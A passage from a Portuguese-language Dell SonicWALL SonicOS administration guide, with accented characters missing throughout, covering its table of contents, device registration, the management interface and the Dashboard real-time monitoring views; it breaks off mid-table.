Status
Configuraes
Estatsticas
RBLFilter
Resumo da lixeira de e-mail
Exibio da Caixa de Lixo Eletrnico
Configuraes da Caixa de Lixo Eletrnico
Configurao de exibio do usurio
Catlogos de Endereos
Gerenciar Usurios
Configurao LDAP
Avanado
Downloads

Parte 11 VPN
Esta parte aborda como criar polticas de VPN no Dispositivo de Segurana Dell SonicWALL
para oferecer suporte a Clientes de VPN Globais, alm de criar polticas de VPN site-a-site
para conectar escritrios executando Dispositivos de Segurana Dell SonicWALL.
A parte de VPN contm as seguintes sees:
Configuraes
Avanado
DHCP sobre VPN
Servidor L2TP
Parte 12 SSL VPN

Esta parte descreve como configurar os recursos de SSL VPN no Dispositivo de Segurana
Dell SonicWALL. Os recursos de SSL VPN fornecem acesso remoto seguro e perfeito aos
recursos na rede local usando o cliente NetExtender.
A parte de SSL VPN contm as seguintes sees:
Status
Configuraes do servidor
Configuraes do portal
Configuraes de cliente
Rotas de cliente
Virtual Office
Parte 13 Virtual Assist

Esta parte descreve o recurso Virtual Assist que permite que os usurios ofeream suporte a
problemas tcnicos do cliente sem precisar estar no local com o cliente. Esse recurso atua
como uma enorme economia de tempo para equipe de suporte, ao adicionar flexibilidade em
como possvel responder s necessidades de suporte. Os usurios podem permitir ou
convidar clientes a associarem-se a uma "fila" para receber suporte e, em seguida, auxiliar
virtualmente cada cliente, assumindo o controle remotamente do computador de um cliente
para diagnosticar e corrigir problemas tcnicos.
A parte de Virtual Assist contm as seguintes sees:
Status
Configuraes
Parte 14 Gerenciamento de usurio

Esta parte cobre como configurar o Dispositivo de segurana Dell SonicWALL para
autenticao de nvel de usurio, assim como gerenciar servios de convidados.
A parte de Gerenciamento de usurio contm as seguintes sees:
Status
Configuraes
Usurios locais
Grupos locais
Servios para convidados
Contas de convidados
| 31
Status de convidados
Parte 15 Alta disponibilidade

Esta parte explica como configurar o Dispositivo de Segurana Dell SonicWALL para alta
disponibilidade para que, em caso de uma perda de conectividade de rede, outro Dispositivo
de Segurana Dell SonicWALL retome todas as conexes ativas.
A parte de Alta disponibilidade contm as seguintes sees:
Status
Configuraes
Avanado
Monitoramento
Parte 16 Servios de segurana

Esta parte inclui uma viso geral dos Servios de Segurana Dell SonicWALL disponveis, bem
como instrues para ativar o servio, incluindo avaliaes gratuitas. Esses servios com base
em assinatura incluem o Dell SonicWALL Gateway Anti-Virus, Dell SonicWALL Intrusion
Prevention Service, Dell SonicWALL Content Filtering Service, Dell SonicWALL Client Anti-
-Virus e outros servios.
A parte de Servios de segurana contm as seguintes sees:
Resumo
Filtro de contedo
Imposio de AV cliente
Antivrus do gateway
Preveno de intruso
Anti-Spyware
Filtro RBL
Filtro Geo-IP
Filtro de botnets
Parte 17 Acelerao de WAN

Esta parte fornece uma viso geral do dispositivo da srie Dell SonicWALL WXA, cenrios de
implantao bsicos e avanados e exemplos de configurao e verificao.
A parte de Acelerao de WAN contm as seguintes sees:
Status
Acelerao de TCP
Acelerao de WFS
Sistema
Logs
Configurando a acelerao de WAN

Parte 18 AppFlow
Esta parte aborda o gerenciamento das estatsticas do relatrio de fluxo do Dispositivo de
Segurana Dell SonicWALL e as definies configurveis para enviar dados do AppFlow e
dados em tempo real para servidores de coleta locais ou externos. O Dispositivo de Segurana
Dell SonicWALL AppFlow oferece suporte para formatos de relatrios AppFlow externos, como
a verso 5 do NetFlow, a verso 9 do NetFlow e IPFIX com extenses.
A parte de AppFlow contm as seguintes sees:
Relatrios de fluxo
Servidor AppFlow
Monitoramento em tempo real
Monitoramento de AppFlow
Relatrios AppFlow
Parte 19 Log
Esta parte cobre o gerenciamento do log, alerta e relatrios aprimorados do Dispositivo de
Segurana Dell SonicWALL. Os recursos de log do Dispositivo de Segurana Dell SonicWALL
oferecem um conjunto abrangente de categorias de log para monitorar as atividades de rede
e de segurana.
A parte de Log contm as seguintes sees:
Visualizao
Categorias
Log do sistema
Automao
Resoluo de nome
Relatrios
Relatrios do
Parte 20 Anexos
Anexo A: CLI
Este apndice aborda a interface de linha de comando (CLI) para o firewall. Fornece uma lista
de comandos CLI, descries de sintaxe e exemplos de configurao.
Anexo B: BGP
Este apndice fornece uma viso geral sobre a implementao do Border Gateway Protocol
(BGP), como funciona e como configur-lo para a sua rede.
Anexo C: Assistentes
Este apndice descreve como usar os Assistentes de Configurao para configurar o
dispositivo de segurana de rede Dell SonicWALL.
A parte de Log contm as seguintes sees:
O Assistente de instalao leva voc passo a passo na configurao de rede para
conectividade com a Internet.
O Assistente de servidor pblico leva voc passo a passo na adio de um servidor
sua rede, como um servidor de e-mail ou um servidor Web.
| 33
O Assistente de poltica de VPN acompanha-o passo a passo na configurao de VPNs
de grupo e VPNs site-a-site.
O Assistente de Regras de aplicativos leva voc passo a passo na criao de Regras
de aplicativo.
Anexo D: IPv6
Este apndice fornece uma viso geral da implementao de IPv6 do SonicOS, de como o IPv6
opera e de como configurar o IPv6 em sua rede.

Convenes do guia
As seguintes convenes so usadas neste guia:
Conveno Uso
Negrito Destaca itens que voc seleciona na interface de gerenciamento do
firewall.
Itlico Destaca um valor a ser inserido em um campo. Por exemplo, digite
192.168.168.168 no campo Endereo IP.
Item de menu > Item de Menu Indica opes de menu variadas na Interface de Gerenciamento.
Por exemplo, Servios de segurana > Filtro de contedo
significa selecionar Servios de Segurana e, em seguida,
selecionar Filtro de contedo.
cones usados neste manual

Essas mensagens especiais se referem a informaes importantes e incluem um smbolo para
identificao rpida:
NOTA: indica uma informao importante que ajuda voc a fazer melhor uso de seu sistema.
CUIDADO: indica um possvel dano ao hardware ou a perda de dados se as instrues no

forem seguidas.
ADVERTNCIA: indica possveis danos ao equipamento, leses pessoais ou morte.
DICA: fornece informaes teis sobre os recursos de segurana e as configuraes no seu

firewall.
Suporte tcnico da Dell SonicWALL

Para resoluo de problemas em tempo hbil do suporte tcnico, visite a Dell SonicWALL na
Internet em:
http://www.sonicwall.com/us/Support.html
Recursos baseados na Web esto disponveis para ajud-lo a resolver problemas tcnicos
mais importantes. Se voc no conseguir encontrar uma soluo para o seu problema tcnico
on-line, voc pode contatar o suporte tcnico da Dell SonicWALL por telefone. Consulte os
nmeros de telefone listados nas pginas da Web a seguir:
http://www.sonicwall.com/us/support/contact.html
http://www.sonicwall.com/us/company/286.html
| 35
Mais informaes sobre os produtos Dell SonicWALL
Entre em contato com Vendas e Suporte Dell SonicWALL para obter informaes sobre
produtos e servios Dell SonicWALL em:
Telefone e Web: http://www.sonicwall.com/us/company/286.html
E-mail: sales@sonicwall.com
Documentao atual
Verifique o site de documentao da Dell SonicWALL para as verses mais recentes deste
manual e todas as outras documentaes de produtos da Dell SonicWALL.

Captulo 1
Introduo
Introduo
Esta seo fornece uma viso geral guiada da interface de gerenciamento do SonicOS.
Registrando o dispositivo de segurana da Dell SonicWALL

Uma vez estabelecida a conexo com a Internet, recomendvel registrar o dispositivo de
segurana da Dell SonicWALL. Registrar o dispositivo de segurana da Dell SonicWALL
oferece os seguintes benefcios:
Tentar uma avaliao gratuita de 30 dias do Dell SonicWALL Intrusion Prevention Service,
do Dell SonicWALL Gateway Anti-Virus, do Content Filtering Service e do Client Anti-Virus
Ativar o Dell SonicWALL Anti-Spam
Ativar upgrades e servios de segurana da Dell SonicWALL
Acessar a atualizaes de firmware do SonicOS
Obter suporte tcnico da Dell SonicWALL
Antes do registro
Se o dispositivo de segurana da Dell SonicWALL no estiver registrado, a seguinte
mensagem ser exibida na pasta Servios de segurana na pasta Sistema > Status na
interface de gerenciamento da Dell SonicWALL: A SonicWALL no est registrada. Clique
aqui para registrar a SonicWALL. necessrio uma conta mysonicwall.com para registrar o
dispositivo de segurana da Dell SonicWALL.
Se o dispositivo de segurana da Dell SonicWALL estiver conectado Internet, ser possvel
criar uma conta mysonicwall.com e registrar seu firewall diretamente da interface de
gerenciamento da Dell SonicWALL. Se voc j possuir uma conta mysonicwall.com, poder
registrar o firewall diretamente na interface de gerenciamento.
A conta mysonicwall.com pode ser acessada de qualquer conexo com a Internet que aponte
seu navegador da web para https://www.mysonicwall.com. mysonicwall.com usa o protocolo
HTTPS (Hypertext Transfer Protocol Secure) para proteger as informaes confidenciais.
Introduo | 37
Nota Certifique-se de que as configuraes Fuso horrio e DNS no firewall estejam corretas ao
registrar o dispositivo.
Nota As informaes de registro de mysonicwall.com no so vendidas ou compartilhadas com

qualquer outra empresa.
Tambm possvel registrar seu dispositivo de segurana no site https://www.mysonicwall.com

usando o Nmero de srie e o Cdigo de autenticao exibidos na seo Servios de
segurana. Clique no link da SonicWALL para acessar a conta mysonicwall.com. Voc
receber um cdigo de registro aps registrar o dispositivo de segurana. Insira o cdigo de
registro no campo abaixo do ttulo Voc receber um cdigo de registro, que dever ser
inserido abaixo de e clique em Atualizar.
Criar uma conta MySonicWALL

Criar uma conta MySonicWALL rpido, simples e gratuito. Simplesmente preencha um
formulrio de registro on-line na interface de gerenciamento da Dell SonicWALL. Para criar
uma conta MySonicWALL da interface de gerenciamento da Dell SonicWALL:
Etapa 1 Na seo Servios de segurana na pgina Sistema > Status, clique no link atualizar o
registro.
Etapa 2 Clique no link Caso no tenha uma conta mysonicwall, clique aqui para criar uma.
Etapa 3 Na pgina Conta MySonicWALL insira suas informaes nos campos Informaes de conta,
Informaes pessoais e Preferncias no formulrio da conta mysonicwall.com. Todos os
campos marcados com um * so os campos obrigatrios.

Nota Lembre-se do nome de usurio e da senha para acessar a conta mysonicwall.com.
Etapa 4 Clique em Enviar depois de preencher o formulrio Conta MySonicWALL.

Etapa 5 Quando o servidor de mysonicwall.com tiver concludo o processamento da conta, uma pgina
ser exibida confirmando que a conta foi criada. Clique em Continuar.
Etapa 6 Parabns! Sua conta mysonicwall.com est ativada. Agora necessrio fazer logon em
mysonicwall.com a partir do dispositivo de gerenciamento para registrar o dispositivo de
segurana da Dell SonicWALL.
Registrando o dispositivo de segurana da Dell SonicWALL

Se voc j possuir uma conta mysonicwall.com, siga estas etapas para registrar o dispositivo
de segurana:
Etapa 1 Na seo Servios de segurana na pgina Sistema > Status, clique no link registrar em A
SonicWALL no est registrada. Clique aqui para registrar a SonicWALL. A pgina Login
de mysonicwall exibida.
Etapa 2 Na pgina Login de mysonicwall.com, insira o nome de usurio e senha de mysonicwall.com
nos campos Nome do usurio e Senha e clique em Enviar.
Etapa 3 As prximas pginas o informam sobre avaliaes gratuitas disponveis para os servios de
segurana da SonicWALL:
Gateway Anti-Virus - protege sua rede toda contra vrus
Client Anti-Virus - protege os computadores de sua rede contra vrus
Premium Content Filtering Service - protege sua rede e melhora a produtividade,
limitando o acesso a sites improdutivos e inadequados
Intrusion Prevention Service - protege sua rede contra cavalos de Troia, vermes e
ataques na camada de aplicativos
Controle de aplicativos - impe como aplicativos e recursos de largura de banda so
usados na rede
Visualizao de aplicativos - permite que os administradores visualizem o trfego de
aplicativos usando grficos em tempo real e monitores de fluxo
Etapa 4 Clique em Continuar em cada pgina.
Etapa 5 Na parte superior da pgina Pesquisa do produto, insira um nome amigvel para o firewall no
campo Nome amigvel e conclua a pesquisa do produto opcional.
Etapa 6 Clique em Enviar.
Etapa 7 Quando o servidor de mysonicwall.com tiver concludo o processamento do registro, uma
pgina ser exibida, confirmando que o dispositivo de segurana da Dell SonicWALL est
registrado.
Etapa 8 Clique em Continuar. A tabela Gerenciar servios on-line na pgina Sistema > Licenas
exibida.
Introduo | 39
Interface de gerenciamento
O SonicOS fornece uma interface grfica fcil de usar para configurar seu dispositivo de
segurana de rede. As sees a seguir fornecem uma viso geral dos recursos principais da
interface de gerenciamento:
Interface de usurio dinmica na pgina 40
Navegar na interface de gerenciamento na pgina 41
cones comuns na interface de gerenciamento na pgina 41
Barra de status na pgina 42
Aplicar alteraes na pgina 42
Dicas de ferramenta na pgina 42
Navegar em tabelas dinmicas na pgina 44
Obter ajuda na pgina 45
Assistentes na pgina 45
Efetuar logout na pgina 45
Interface de usurio dinmica

As estatsticas de tabela e as entradas de log so atualizadas dinamicamente na interface de
usurio sem exigir que os usurios recarreguem seus navegadores. As conexes ativas,
sesses de usurio, chamadas VoIP e atividades semelhantes podem ser desconectadas ou
liberadas dinamicamente atravs de um nico clique no cone de excluso na coluna
Liberar ou Efetuar logout.
Essa interface dinmica leve foi projetada para no causar impacto no servidor da Web, na
utilizao da CPU, na largura de banda ou em outros fatores de desempenho. Voc pode
deixar sua janela do navegador em uma pgina de atualizao dinmica indefinidamente sem
afetar o desempenho do seu firewall.

Navegar na interface de gerenciamento
A navegao na interface de gerenciamento facilitada por uma hierarquia de botes de menu
na barra de navegao (lado esquerdo da janela de seu navegador). Quando voc clicar em
um boto de menu, as funes de gerenciamento relacionadas so exibidas como itens de
submenu na barra de navegao.
Se a barra de navegao continuar abaixo da parte inferior do seu navegador, exibido um

smbolo de seta para cima/para baixo no canto inferior direito da barra de navegao. Passe
o mouse sobre a seta para cima ou para baixo para rolar a barra de navegao para cima ou
para baixo.
cones comuns na interface de gerenciamento

O seguinte descreve as funes de cones comuns usados na interface de gerenciamento:
Ao clicar no cone de editar exibida uma janela para editar as configuraes.
Ao clicar no cone de excluir , excluda uma entrada da tabela
Se mover o ponteiro sobre o cone de comentrio , exibido texto de uma entrada do
campo Comentrio.
Introduo | 41
Barra de status
A barra Status na parte inferior da janela de interface de gerenciamento exibe o status de
aes executadas na interface de gerenciamento.
Aplicar alteraes
Clique no boto Aceitar na parte superior da interface de gerenciamento para salvar quaisquer
alteraes de configurao realizadas na pgina.
Se as configuraes estiverem includas em uma janela secundria na interface de

gerenciamento, as configuraes so aplicadas automaticamente ao firewall quando voc
clicar em OK.
Dicas de ferramenta
O SonicOS fornece dicas de ferramenta incorporadas ou pequenas janelas pop-up que so
exibidas quando voc passa seu mouse sobre um elemento na interface de gerenciamento.
Elas fornecem breves informaes que descrevem o elemento. As dicas de ferramentas so
exibidas para muitos formulrios, botes, ttulos de tabelas e entradas.
Nota Nem todos os elementos de interface do usurio tm dicas de ferramenta. Se no for

exibida uma dica de ferramenta aps passar o mouse sobre um elemento por alguns
segundos, voc pode concluir seguramente que ele no tem uma dica de ferramenta
associada.

Quando aplicvel, as dicas de ferramenta exibem os valores mnimo, mximo e padro para
entradas de formulrio. Essas entradas so geradas diretamente a partir do firmware do
SonicOS, para que os valores sejam os corretos para a combinao de firmware e plataforma
especfica que voc est usando.
O comportamento das dicas de ferramenta pode ser configurado na pgina Sistema >
Administrao.
As dicas de ferramenta esto habilitadas por padro. Para desabilitar as dicas de ferramenta,
desmarque a caixa de seleo Habilitar dica de ferramenta. possvel configurar o perodo
de tempo antes de as dicas de ferramenta serem exibidas:
Atraso de dica de ferramenta de formulrio durao, em milissegundos, antes de as dicas
de ferramenta serem exibidas para formulrios (as caixas onde voc insere texto).
Atraso de dica de ferramenta de boto durao, em milissegundos, antes de as dicas de
ferramenta serem exibidas para botes de opo e caixas de seleo.
Atraso de dica de ferramenta de texto durao, em milissegundos, antes de as dicas de
ferramenta serem exibidas para texto da interface de usurio.
Introduo | 43
Navegar em tabelas dinmicas
Na interface de usurio dinmica do SonicOS, as estatsticas de tabela e as entradas de log
so agora atualizadas dinamicamente na interface de usurio sem exigir que os usurios
recarreguem seus navegadores. Voc pode navegar em tabelas na interface de gerenciamento
com vrias entradas usando os botes de navegao localizados no canto superior direito da
tabela.
A barra de navegao em tabela inclui botes para deslocamento nas pginas da tabela.
Um nmero de tabelas agora inclui uma opo para especificar o nmero de itens exibidos por
pgina.
Muitas tabelas agora podem ser classificadas novamente clicando nos ttulos das vrias
colunas. Em tabelas que so classificveis, uma dica de ferramenta "Clique para classificar
por" aparece ao passar o mouse sobre os ttulos da coluna. Quando as tabelas so
classificadas, as entradas com o mesmo valor para a coluna so agrupadas em conjunto com
o valor comum sombreado como um subttulo. No exemplo a seguir, a tabela Conexes ativas
classificada por IP de origem.
As conexes ativas, sesses de usurio, chamadas VoIP e atividades semelhantes podem ser
desconectadas ou liberadas dinamicamente atravs de um nico clique no cone de excluso
na coluna Liberar ou Efetuar logout.
Vrias tabelas incluem um cone de estatsticas de tabela que exibe um resumo breve e
de atualizao dinmica de informaes relativas a essa entrada da tabela. As tabelas com o
cone de estatsticas incluem:
Polticas de NAT na pgina Rede > Polticas de NAT
Regras de acesso na pgina Firewall > Regras de acesso
Protocolos de retransmisso na pgina Rede > Auxiliar de IP
Polticas de regras de aplicativos na pgina Firewall > Regras de acesso

Vrias tabelas incluem uma dica de ferramenta que exibe o nmero mximo de entradas que
o firewall suporta. Por exemplo, a imagem a seguir mostra o nmero mximo de grupos de
endereos que o dispositivo suporta.
As tabelas que exibem a dica de ferramenta de entrada mxima incluem polticas de NAT,
regras de acesso, objetos de endereos e grupos de endereos.
Obter ajuda
O canto superior direito de cada pgina da interface de gerenciamento possui as quatro
opes seguintes nas quais voc pode clicar:
Assistentes
Ajuda
Efetuar logout
Modo: Configurao
Assistentes
Cada firewall inclui uma opo de Assistente de configurao que o orienta em vrias
configuraes de firewall, como configurao de rede WAN, configurao de rede LAN,
configurao de rede LAN sem fio e configurao de modem 3G/4G. Se clicar em Assistentes,
obtm acesso ao Assistente de configurao.
Ajuda
Cada firewall inclui ajuda on-line baseada na Web que explica como usar pginas de interface
de gerenciamento e como configurar o firewall. Se clicar em Ajuda, obtm acesso ajuda
sensvel ao contexto para a pgina.
Efetuar logout
Cada firewall inclui uma opo para Efetuar logout que finaliza a sesso de interface de
gerenciamento e exibe a pgina de autenticao para efetuar logon no firewall. Se clicar em
Efetuar logout, efetuado o seu logout do firewall.
Introduo | 45
Modo: Configurao
Cada firewall inclui uma opo Modo: Configurao que alterna o modo de configurao da
interface de gerenciamento entre o modo de Configurao e No configurao. No modo de
Configurao, voc pode realizar alteraes nas configuraes do firewall. No modo de No
configurao, voc pode somente visualizar as configuraes do firewall. Se clicar na seta
junto de Modo: Configurao, permitido alternar entre o modo de configurao e o modo de
no configurao.

Parte 2
Painel
| 47
Captulo 2
Usando o Painel de visualizao do
SonicOS
Painel de visualizao
O Painel de visualizao oferece aos administradores uma interface eficaz e eficiente para
monitorar visualmente a rede em tempo real, oferecendo eficientes grficos de fluxo de dados
em tempo real, regras personalizveis e configuraes flexveis de interface. Com o Painel de
visualizao, os administradores podem exibir com eficincia e classificar os dados de rede e
a largura de banda em tempo real para:
Identificar os aplicativos e sites com demandas de alta largura de banda
Ver o uso de aplicativos em uma base por usurio
Antecipar ataques e ameaas encontradas pela rede
Este documento contm as seguintes sees:
Painel > Monitor multi-core na pgina 50
Painel > Monitor em tempo real na pgina 53
Painel > Trao AppFlow na pgina 63
Painel > Monitor AppFlow na pgina 64
Painel > Relatrios AppFlow na pgina 75
Painel > Relatrios de ameaas na pgina 78
Painel > Monitor de usurio na pgina 81
Painel > Monitor BWM na pgina 82
Painel > Monitor de conexes na pgina 82
Painel > Monitor de pacotes na pgina 84
Painel > Monitor de log na pgina 89
Usando o Painel de visualizao do SonicOS | 49

Painel > Monitor multi-core
O Monitor multi-core exibe estatsticas atualizadas dinamicamente sobre a utilizao dos 24
a 32 ncleos individuais do dispositivo de segurana de rede da Dell SonicWALL. O nmero
de ncleos depende do modelo 9200, 9400 ou 9600.
O ncleo 1 lida com o plano de controle e seu uso exibido em verde no Monitor multi-core.
Os ncleos restantes manipulam o plano de dados. Para maximizar a flexibilidade do
processador, as funes no so dedicadas a ncleos especficos em vez disso, todos os
ncleos podem processar todas as tarefas de plano de dados. A memria compartilhada
entre todos os ncleos. Cada ncleo pode processar um fluxo separado simultaneamente,
permitindo que at 31 fluxos sejam processados em paralelo.
Nota Para maior convenincia e acessibilidade, o Monitor multi-core pode ser acessado na
pgina Painel > Monitor multi-more ou na pgina Sistema > Diagnstico. A exibio
Monitor multi-core idntica, independentemente da guia atravs da qual acessada.
Habilitando o monitor em tempo real e coleta de AppFlow

Os recursos de monitoramento de aplicativos em tempo real contam com o mecanismo de
coleta de fluxo para coletar e exibir dados. Antes que seja possvel exibir o grfico de
"aplicativos" no Monitor em tempo real, Monitor de AppFlow ou Relatrios de AppFlow, deve-
-se primeiro habilitar e configurar o recurso de coleta de fluxo.
Para habilitar a coleta de AppFlow interno e Monitoramento em tempo real:
Etapa 1 Navegue para a pgina AppFlow > Relatrio de fluxo na interface de gerenciamento do
SonicOS. Para a coleo de fluxo no dispositivo, marque a caixa de seleo Relatar AppFlow
para coletor interno.
a. Marque a caixa de seleo Habilitar coleta de dados em tempo real e selecione o menu
suspenso Coletar dados em tempo real para os relatrios que deseja ver capturados:
Principais aplicativos
Bits por segundo

Pacotes por segundo
Tamanho mdio do pacote
Conexes por segundo
Utilitrio de ncleo
Utilitrio de memria
b. Para habilitar esses relatrios, clique no boto Aceitar para salvar as alteraes.

c. Navegue at a pgina Rede > Interfaces. Clique no cone Configurar para a interface na
qual deseja habilitar relatrios de fluxo.
d. Na guia Avanado, verifique se a caixa de seleo Habilitar relatrios de fluxo est

marcada.
e. Clique no boto OK para salvar as alteraes.
f. Repita as etapas de 6 a 7 para cada interface que deseja monitorar.
Para obter mais informaes detalhadas sobre como definir configuraes de Relatrios de
fluxo, consulte Painel > Relatrios AppFlow na pgina 75.

Painel > Monitor em tempo real
O Monitor em tempo real fornece aos administradores uma exibio multifuncional, inclusive
com informaes sobre aplicativos, uso de largura de banda, taxa de pacotes, tamanho do
pacote, taxa de conexo, contagem de conexes e monitoramento de multi-core.

Esta seo contm as seguintes subsees:
Usando a barra de ferramentas na pgina 54
Monitor de aplicativos na pgina 56
Fluxo de largura de banda de ingresso e de egresso na pgina 58
Monitor de taxa de pacote na pgina 60
Monitor de tamanho de pacotes na pgina 60
Monitor de contagem de conexes na pgina 61
Fluxo de monitor de vrios ncleos na pgina 61
Usando a barra de ferramentas

A barra de ferramentas do Monitor em tempo real contm recursos para especificar a taxa de
atualizao, exportar detalhes, configurar paletas de cores, alterar a quantidade de dados
exibidos e pausar ou reproduzir o fluxo de dados. As alteraes feitas na barra de ferramentas
se aplicam a todos os fluxos de dados.

Opo Widget Descrio
Taxa de atualizao Determina a frequncia em que os dados so
atualizados. necessrio um nmero inteiro entre 1 e
10 segundos. Um segundo o padro.
Exportar Exporta o fluxo de dados em um arquivo (.csv) de

varivel separado por vrgulas. O nome de arquivo
padro sonicflow.csv.
Configurar Permite a personalizao da paleta de cores para o

Grfico de aplicativos e o Grfico de largura de banda.
Para personalizar a paleta de cor:
Insira os cdigos de cores hexadecimais desejados
nos campos de texto fornecidos.
Selecione Padro para obter um intervalo de cores
padro.
Selecione Gerar para gerar um intervalo aleatrio de
cores.
Se um gradiente for desejado, selecione a caixa Usar
gradiente localizada abaixo dos campos de textos.
Intervalo de Exibe dados pertencentes a um intervalo especfico de
exibio tempo. Dois minutos a configurao padro para o
intervalo de exibio.
Data e Hora Exibe a hora atual no formato de 24 horas (hh:mm:ss) e

a data atual no formato Ms/Dia.
Pausar Congela o fluxo de dados. A data e hora tambm sero

congeladas.
O boto Pausar ser exibido em cinza, se o fluxo de
dados tiver sido congelado.
Reproduzir Descongela o fluxo de dados. A data e hora sero
atualizadas, assim que o fluxo de dados for atualizado.
O boto Reproduzir ser exibido em cinza, se o fluxo de
dados estiver ativo.

Monitor de aplicativos
O fluxo de dados de aplicativos fornece uma representao visual dos aplicativos atuais que
acessam a rede.
As opes esto disponveis para exibir, dimensionar e ver a interface do aplicativo.
Opo Widget Descrio

Bloquear Bloqueia as opes de exibio para a interface do
aplicativo. A opo bloquear e desbloquear estar
disponvel ao selecionar "Aplicativos mais frequentes".
Aplicativos mais frequentes exibe os 25 principais
aplicativos, possvel usar a opo bloquear ou
desbloquear para manter o relatrio de alterao dos 25
principais aplicativos.
Desbloquear Desbloqueie as opes de exibio para a interface do
aplicativo.
Exibio de Especifica os aplicativos exibidos no Grfico de fluxo de

aplicativo aplicativo.
Um menu suspenso permite que o administrador
especifique Aplicativos mais frequentes, Todos os
aplicativos ou aplicativos individuais. Se desejar, vrios
aplicativos podem ser selecionados, clicando em mais
de uma caixa de seleo.
Escala Permite o Dimensionamento-Y automtico ou

dimensionamento personalizado do Grfico de fluxo do
aplicativo.
Os valores para dimensionamento personalizado devem
ser um nmero inteiro. Especificar uma unidade
opcional. Se uma unidade for desejada, estas sero as
opes disponveis:
K para quilo.
M para Mega.
G para Giga.
% para porcentagem.
Se uma escala personalizada de 100 Kbps for desejada,
"100K" dever ser inserido. O nmero inteiro 100
inserido seguido pela unidade K.

Opo Widget Descrio
Grfico de barras Exibe os dados de aplicativos em um formato de grfico
de barras.
Grfico de fluxo Exibe os dados de aplicativos em um formato de grfico

de fluxo.
Formatos disponveis
Os administradores so capazes de ver os grficos de fluxo do aplicativo em um formato de
grfico de barras ou de grfico de fluxo. O formato de grfico de barras exibe aplicativos
individualmente, permitindo que os administradores comparem os aplicativos. Neste grfico, o
eixo x exibe o nome dos aplicativos. O eixo y exibe a quantidade de trfego para cada
aplicativo. O exemplo a seguir uma exibio de "Grfico de fluxo".
O formato do grfico de fluxo exibe dados de aplicativos empilhados. Neste grfico, o eixo x
exibe a hora atual e o eixo y exibe o trfego para cada aplicativo. O exemplo a seguir uma
exibio de "Grfico de barras".

Fluxo de largura de banda de ingresso e de egresso
O fluxo de dados de largura de banda de ingresso e de egresso fornece uma representao
visual de trfego de largura de banda de entrada e sada. A porcentagem atual de total de
largura de banda usada, mdia de fluxo de trfego de largura de banda e a quantidade mnima
e mxima de trfego que passou por cada interface est disponvel na tela. Os administradores
so capazes de ver o grfico de fluxo de largura de banda ingresso e de egresso em um
formato de grfico de barras ou de grfico de fluxo.
O formato de grfico de barras exibe dados pertencentes s interfaces individuais em um
grfico de barras, permitindo que os administradores comparem as Interfaces individuais de
largura de banda. Neste grfico, o eixo x indica as Interfaces enquanto o eixo y indica o trfego
de largura de banda de ingresso e de egresso.
O formato do grfico de fluxo substitui as Interfaces de largura de banda, permitindo que os
administradores vejam todo o trfego de largura de banda de ingresso e de egresso, conforme
ele ocorrer. O eixo x exibe a hora atual e o eixo y exibe o trfego de largura de banda de
ingresso e de egresso.

Esto disponveis opes para personalizar a exibio, escala e visualizao da interface de
largura de banda de ingresso e de egresso.
Opo Widget Descrio

Exibio de taxa de Especifica quais interfaces so exibidas no Grfico de
interfaces fluxo de largura de banda.
Um menu suspenso fornece o administrador com
opes para especificar Taxas de todas as interfaces,
Todas as interfaces e interfaces individuais.
As interfaces individuais variam dependendo do nmero
de interfaces na rede do administrador. Vrias interfaces
podem ser selecionadas, se desejado.
Escala Permite o Dimensionamento-Y automtico ou o

dimensionamento personalizado do Grfico de fluxo da
largura de banda.
opcional. Se uma unidade for desejada, quatro opes
estaro disponveis:
K para quilo.
M para Mega.
G para Giga.
% para porcentagem.
Se uma escala personalizada de 100 Kbps for desejada,
"100K" dever ser inserido. O nmero inteiro 100
inserido seguido pela unidade K.
Formato de grfico Exibe os dados de largura de banda em tempo real em
de barras um formato de grfico de barras.
Formato do grfico Exibe os dados de largura de banda em tempo real em

de fluxo um formato de grfico de fluxo.
Dicas de ferramentas
Rolar sobre as interfaces fornece dicas de ferramentas com informaes sobre a zona, o
endereo IP e o status atual da porta atribudos interface.

Nota Os grficos de fluxo de largura de banda no tm nenhuma correlao direta com os
grficos de fluxo de aplicativo.
Monitor de taxa de pacote

O Monitor de taxa de pacote fornece o administrador com informaes sobre a taxa de pacote
de ingresso e de egresso em pacotes por segundo (pps). Isso pode ser configurado para
mostrar taxa de pacotes por interface de rede. O grfico mostra a taxa mdia atual de pacotes,
a taxa mnima de pacotes e taxa mxima de pacotes para trfego de rede de ingresso e de
egresso.
Monitor de tamanho de pacotes

O Monitor de tamanho de pacote fornece o administrador com informaes sobre a taxa de
pacote de ingresso e de egresso em bytes (B). Isso pode ser configurado para mostrar o
tamanho de pacote por interface de rede. O grfico mostra a mdia atual de tamanho de
pacote, o tamanho mnimo do pacote e o tamanho mximo de pacotes para trfego de rede de
ingresso e de egresso.

Monitor de contagem de conexes
O fluxo de dados de Contagem de conexes fornece ao administrador uma representao
visual de nmero total "atual" de conexes, nmero de conexes de "pico" e mximo. Neste
exemplo, o eixo y exibe o nmero total de conexes de 0C (zero conexes) para 1KC (um quilo
de conexes).
.
Fluxo de monitor de vrios ncleos

O Monitor de vrios ncleos exibe estatsticas atualizadas dinamicamente na utilizao dos
ncleos individuais do firewall. O ncleo 1 at o ncleo 8 lida com o plano de controle. O uso
do ncleo 1 at o ncleo 8 exibido em verde no Monitor de vrios ncleos. Os ncleos
restantes manipulam o plano de dados. Para maximizar a flexibilidade do processador, as
funes no so dedicadas a ncleos especficos, em vez disso, todos os ncleos podem
processar todas as tarefas de plano de dados. A memria compartilhada entre todos os
ncleos. Cada ncleo pode processar um fluxo separado simultaneamente, permitindo que at
88 fluxos sejam processados em paralelo.
Os administradores so capazes de ver o grfico de fluxo Monitor de vrios ncleos em um
formato de grfico de barras ou de grfico de fluxo. O formato de grfico de barras exibe dados
relativos aos ncleos individuais. Nesse grfico o eixo x exibe os ncleos nos quais o eixo y
exibe a porcentagem de CPU usada.

O formato do grfico de fluxo substitui os dados do Monitor de vrios ncleos. O eixo x exibe
a hora atual e o eixo y exibe a porcentagem de CPU usada.
Escala e Exibio so as opes disponveis para personalizar a interface de Monitor de vrios

ncleos.
Opo Widget Descrio

Exibio agregada Especifica quais ncleos so exibidos no Grfico de
fluxo Monitor de vrios ncleos.
Um menu suspenso que permite ao administrador
especificar Atual (agregao), Mdia (agregao) e
ncleos individuais.
Os ncleos individuais variam dependendo do nmero
de ncleos disponveis. Vrios ncleos podem ser
selecionados, se desejado.
Escala Permite o Dimensionamento-Y automtico ou

dimensionamento personalizados do Grfico de fluxo
Monitor de vrios ncleos.
opcional. Se uma unidade for desejada, as quatro
opes disponveis incluiro:
K para quilo.
M para Mega.
G para Giga.
% para porcentagem.
Se uma escala personalizada de 100 por cento for
